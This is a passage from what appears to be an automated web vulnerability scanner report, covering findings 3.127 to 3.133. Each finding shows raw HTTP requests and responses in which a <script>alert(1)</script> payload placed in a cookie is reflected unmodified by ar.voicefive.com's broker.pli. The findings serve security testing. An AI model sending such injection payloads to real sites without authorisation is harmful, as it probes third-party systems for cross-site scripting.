Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&7c55c<script>alert(1)</script>0001538d7dc; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&7c55c<script>alert(1)</script>0001538d7dc', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 5247f<script>alert(1)</script>be803c30b08 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&5247f<script>alert(1)</script>be803c30b08; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
u May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&5247f<script>alert(1)</script>be803c30b08', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&ini
...[SNIP]...

3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 81a12<script>alert(1)</script>be61ae8b882 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&81a12<script>alert(1)</script>be61ae8b882; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:47 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:47 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949587; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&81a12<script>alert(1)</script>be61ae8b882' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

3.129. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the HTML document as plain text between tags. The payload 247c1<script>alert(1)</script>a0857f057ac was submitted in the ar_p90452457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&247c1<script>alert(1)</script>a0857f057ac; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:49 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949589; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Exp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&247c1<script>alert(1)</script>a0857f057ac', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

3.130. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload a9998<script>alert(1)</script>065e4369a02 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&a9998<script>alert(1)</script>065e4369a02; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&a9998<script>alert(1)</script>065e4369a02', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

3.131. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 6dbcb<script>alert(1)</script>b29b024f0ca was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&6dbcb<script>alert(1)</script>b29b024f0ca; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:47 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:47 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949587; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&6dbcb<script>alert(1)</script>b29b024f0ca', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

3.132. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 27999<script>alert(1)</script>2c482b2dc1b was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&27999<script>alert(1)</script>2c482b2dc1b; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
r 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&27999<script>alert(1)</script>2c482b2dc1b', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

3.133. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 987b0<script>alert(1)</script>64c88d49c21 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
